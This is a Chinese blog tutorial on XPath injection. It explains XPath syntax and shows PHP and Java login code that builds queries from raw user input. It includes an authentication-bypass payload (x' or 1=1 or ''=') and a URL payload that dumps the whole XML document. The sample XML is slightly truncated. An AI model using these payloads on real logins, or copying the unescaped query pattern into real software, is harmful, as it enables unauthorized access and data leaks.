Web安全之XPath注入

最新推荐文章于 2023-12-06 21:48:10 发布
最新推荐文章于 2023-12-06 21:48:10 发布
阅读量415 收藏 1
点赞数 1
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlsj228/article/details/115046401
版权

1 XPath

XPath即为XML路径语言,它是一种在xml文件中查找信息的语言。

在xPath中,有七种元素的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根节点)。xml文档被当作文档树来解析,树的根被称为文档节点或者根节点。

XML文件内容如下:

XPath 使用路径表达式在 XML 文档中选取节点。节点是通过沿着路径或者 step 来选取的。 下面列出了最有用的路径表达式:

nodename:选取此节点的所有节点

/:    从根节点选取

//:  从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置

.:   选取当前节点

..:  选取当前节点的父节点

@:   选取属性

2 Xpath注入

XPath 注入利用 XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的 XPath 查询代码,以获得高权限信息的访问权。

XPath注入类似于SQL注入,当网站使用未经正确处理的用户输入查询 XML 数据时,可能发生 XPATH 注入。但是XPath 中数据管理不受权限控制,在表单中提交恶意的 XPath 代码,就可获取到权限限制数据的访问权,并可修改这些数据。同样地,构造恶意查询获取到系统内部完整的XML 文档内容造成信息泄露。也可以在获取到XML文档内容后进行用户权限提升等。

3 案例演示

3.1 PHP代码

1)读取xml的xpath方法

<?php
if(file_exists('test.xml')){
	$xml=simplexml_load_file('test.xml');
	if($_POST['submit']){
		$username=$_POST['username'];
		$password=$_POST['password'];
		$x_query="/accounts/user[username='{$username}' and password='{$password}']";
		$result = $xml->xpath($x_query);
		if(count($result)==0){
			echo '登录失败';
		}else{
			echo "登录成功";
			$login_user = $result[0]->username;
			echo "you login as $login_user";
		}
		}
		}
?>

2)test.xml

<?xml version="1.0" encoding="UTF-8"?>

<accounts>

<user id="1">

<username>xpathtest</username>

<email>123@qq.com</email>

<accounttype>administrator</accounttype>

<password>admin787</password>

</user>

3)测试语句

x' or 1=1 or ''='

此时的语句:$x_query="/accounts/user[username='x' or 1=1 or ''='' and password='']";

/accounts            所有accounts节点的子元素

/user                   所有user节点的子元素
          username ='x'      user子元素中属性username为x
           password =' '     user子元素中属性password为空

http://127.0.0.1/debug.php?user=vk'] | //* | //*['

vk']    闭合前面
|       表示分别执行,类似于SQL中的union select,这个符号的前后路径都回去查询     
//*     表示匹配所有的节点
|       表示分别执行,类似于SQL中的union select,这个符号的前后路径都回去查询
//*['   前面的//*是xpath语法必须的,如果没有则会报错,['则是闭合后面的内容

XPATH语法中是没有注释的,不能像SQL语句那样注释后面多余的语句,所以只能采用闭合的方式。

3.2 Java代码

DocumentBuilderFactory doc=DocumentBuilderFactory.newInstance();

DocumentBuilder db=doc.newDocumentBuilder();

InputStream is= new  FileInputStream("test.xml");    

Document doc=dombuilder.parse(is);

Element root=doc.getDocumentElement();

NodeList users=root.getChildNodes();

XPathFactory factory = XPathFactory.newInstance();

XPath xpath = factory.newXPath();

XPathExpression expr;

expr = xpath.compile("/accounts/user[username='"+ uname +"']");

Object result = expr.evaluate(doc, XPathConstants.NODESET);

安全学习交流群:687398569

凌木LSJ
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
测试XPath注入.docx
09-06
测试XPath注入 XPath 注入是指攻击者通过提交恶意的 XPath 查询来破坏应用程序的逻辑或获取未授权访问的数据的安全漏洞。XPath 是一种用于导航 XML 文档并从中获取数据的解释型语言。许多时候,一个 XPath 表达式...
PHP验证登录用户名和密码
热门推荐
最最最最最可爱的桐桐
04-05 1万+
** 简单版 ** 1数据库连接 mysql_connect("127.0.0.1","root","root")or die("数据库链接错误".mysql_error()); //连接数据库,(服务器地址,用户名,密码) mysql_select_db("kk") or die("数据库访问错误".mysql_error()); //选择数据库 mysql_query("set name...
应用安全系列之四:XPATH注入
jimmyleeee的专栏
02-26 1486
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 XPath即XML路径语言(XML Path Language),是一种用来确定XML文档中某部分位置的语言。XPath基于XML的树状结构,提供在数据结构树中寻找节点的能力。XPath提出的初衷是将其作为一个通用的、介于XPointer与XSL之间的语法模型。 XPath使用路径表达式在 XML 文档中进行导航。 XPa
xpath注入
dahe
05-07 1627
1.什么是xpath XPath 使用路径表达式在 XML 文档中进行导航 XPath 包含一个标准函数库 XPath 是 XSLT 中的主要元素 XPath 是一个 W3C 标准 2.学习xpath 在了解xpath注入之前,可以先学习一下语法和基础知识 https://www.runoob.com/xpath/xpath-syntax.html 3.xpath注入是什么 XPath 注入利用 XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的 XPath
Xpath注入
2202_75361164的博客
12-04 391
Xpath注入,常规使用加例题
XPath注入:攻击与防御技术
hl1293348082的专栏
03-31 1333
相信大家都非常熟悉 “注入” 这种攻击方式。 “注入” 这种攻击方式被列为了 OWASP 十大攻击的榜首。然而,本文所要讲述的不是被人熟知的SQL 注入攻击。而是相对较为冷门的 XPath 和 XQuery 注入攻击。 什么是 XPath ? 首先我们来了解一下什么是 XPathXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。 XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,
X-path注入.pdf
04-24
Xpath注入攻击介绍,本pdf为全英文
Web应用安全:Mysql盲注.pptx
06-19
Web应用安全领域中,MySQL盲注是一种常见的安全漏洞,它发生在SQL注入攻击中,但攻击者无法直接看到数据库的响应结果。在这种情况下,攻击者必须通过观察页面加载时间、页面内容的变化或者其他间接方式来判断SQL查询...
Web安全深度剖析(张柄帅)
07-25
10.3.2 XPath注入 212 10.3.3 JSON注入 215 10.3.4 HTTP Parameter Pollution 216 10.4 URL跳转与钓鱼 218 10.4.1 URL跳转 218 10.4.2 钓鱼 220 10.5 WebServer远程部署 224 10.5.1 Tomcat 224 10.5.2 JBoss 226 ...
WEB安全测试
07-02
12.13 以交互方式尝试XPath注入 273 12.14 以交互方式尝试服务器端包含(SSI)注入 275 12.15 系统地尝试服务器端包含(SSI)注入 276 12.16 以交互方式尝试LDAP注入 278 12.17 以交互方式尝试日志注入 280
XPath注入
最新发布
十一.的博客
12-06 237
XPath定位是指利用XPath查询语句定位XML文档中的元素和属性。XPath 通配符可用来选取未知的 XML 元素。
浅谈Xpath注入漏洞
记录学习,一起进步
03-09 1476
Xpath注入漏洞
xpath注入与盲注
RMC131的博客
04-19 1005
XPath是一种查询语言,描述如何在XML文档中查找特定元素(包括属性、处理指令等),于SQL相似,Xpath可以引用XML文档的几乎任何部分,而不受访问控制限制。XPath盲注可以从一个使用不安全方式嵌入用户信息的应用中提取数据,在输入未被过滤的情况下,攻击者可以提交并执行有效的XPath代码。这种攻击适用情况:攻击者不清楚XML文档的架构,或者错误消息被抑制,一次只能通过布尔化查询来获取部分信息,与SQL盲注相似。
Xpath注入详解
Fly_鹏程万里
08-14 2007
0x01 什么是Xpath XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。它是一种用来在内存中导航整个XML树的语言,它的设计初衷是作为一种面向XSLT和XPointer的语言,后来独立成了一种W3C标准。 XPath基于XML的树状结构,有不同类型的节点,包括元素节点,属性节点和文本...
java xpath 解析xml字符串_【缺陷周话】第 18期 — XPath 注入
weixin_34093995的博客
12-26 684
聚焦源代码安全,网罗国内外最新资讯!*声明:《缺陷周话》栏目系列文章由360代码卫士团队原创出品。未经许可,禁止转载。代码审计是使用静态分析发现源代码中安全缺陷的方法,能够辅助开发或测试人员在软件上线前较为全面地了解其安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并且已经成为安全开发生命周期SDL和DevSecOps等保障体系的重要技术手段。360代码卫士团队...
从MySQL注入XPath注入
m0_69305074的博客
04-28 1040
0x00 XPath基础知识 这个部分只是单纯铺垫XPath基础知识,不涉及注入,了解XPath可以跳过 这里直接引用 w3school的XPath教程 中间的案例,因为里面给了好多示例,基本一看就懂的那种。 XPath是什么? XPath是用来从XML文档中进行查找信息的语言。 XPath节点(Node) XPath中有7种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根)节点 这个没有太大了解的必要,知道节点这个名词就够了,不需要分得特别细致。 选取节点 后面都以..
Xpath注入学习记录
paidx0
08-19 494
XPath 是一门在 XML 文档中查找信息的语言。XPath 可用来在 XML 文档中对元素和属性进行遍历。XPath 是 W3C XSLT 标准的主要元素,并且 XQuery 和 XPointer 都构建于 XPath 表达之上。XML 不是 HTML的代替,HTML旨在显示信息,XML旨在显示传输信息,关注的是数据的内容。......
[NOTE] XPath及其注入
qq_43266093的博客
12-10 1274
[NOTE] XPath及其注入 XPath XPath是一门在XML文档中查找信息的语言 这里学习基本知识及相关语法 一个加载XML文件,并使用XPath解析和查找元素的例子: <!DOCTYPE html> <html> <body> <script> function loadXMLDoc(dname) { if (window.XMLHttpRequest) { // 加载XML文档-步骤一 xhttp=new XML
Web安全深度解析:攻防技术与实践
常见漏洞攻防部分深入讲解了一系列Web应用安全问题,包括SQL注入、XSS跨站脚本、CSRF跨站请求伪造、SSRF服务器端请求伪造、命令注入、目录穿越、文件读取、文件上传、文件包含、XML外部实体(XXE)注入、模板注入、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值